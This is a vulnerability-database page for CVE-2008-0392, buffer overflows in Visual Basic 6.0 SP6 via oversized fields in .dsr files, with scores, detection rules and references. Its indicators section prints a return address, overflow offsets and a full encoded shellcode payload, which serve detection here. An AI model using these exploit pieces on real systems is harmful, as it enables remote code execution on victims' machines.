CVE-2008-0392
published 2008-01-23CVE-2008-0392: Multiple buffer overflows in Microsoft Visual Basic Enterprise Edition 6.0 SP6 allow user-assisted remote attackers to execute arbitrary code via a .dsr file…
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.46%
98.0th percentile
Multiple buffer overflows in Microsoft Visual Basic Enterprise Edition 6.0 SP6 allow user-assisted remote attackers to execute arbitrary code via a .dsr file with a long (1) ConnectionName or (2) CommandName line.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_basic | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
EIP return address: \xFF\xBE\x3F\x7E (call ESP from user32.dll)
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a
- →Detect malicious .dsr files where the ConnectionName field value is abnormally long (>559 characters), indicating a buffer overflow attempt. ↗
- →Detect malicious .dsr files where the CommandName field value is abnormally long (>566 characters), indicating a buffer overflow attempt. ↗
- →Flag .dsr files containing the CLSID {C0E45035-5775-11D0-B388-00A0C9055D8E} with oversized ConnectionName or CommandName property values as potentially malicious. ↗
- →Look for the return address bytes FF BE 3F 7E (call ESP gadget in user32.dll) embedded within .dsr file content as an EIP overwrite indicator. ↗
- ·The return address (EIP) \xFF\xBE\x3F\x7E is specific to the user32.dll version shipped with the tested environment; it may differ across patch levels or OS versions. ↗
- ·The overflow offsets (559 spaces for ConnectionName, 566 for CommandName) are specific to Microsoft Visual Basic Enterprise Edition 6.0 SP6 and may not apply to other versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://secunia.com/advisories/28563http://www.securityfocus.com/bid/27349http://www.securitytracker.com/id?1019258http://www.vupen.com/english/advisories/2008/0195https://exchange.xforce.ibmcloud.com/vulnerabilities/39773https://www.exploit-db.com/exploits/4938http://secunia.com/advisories/28563http://www.securityfocus.com/bid/27349http://www.securitytracker.com/id?1019258http://www.vupen.com/english/advisories/2008/0195https://exchange.xforce.ibmcloud.com/vulnerabilities/39773https://www.exploit-db.com/exploits/4938
2008-01-23
Published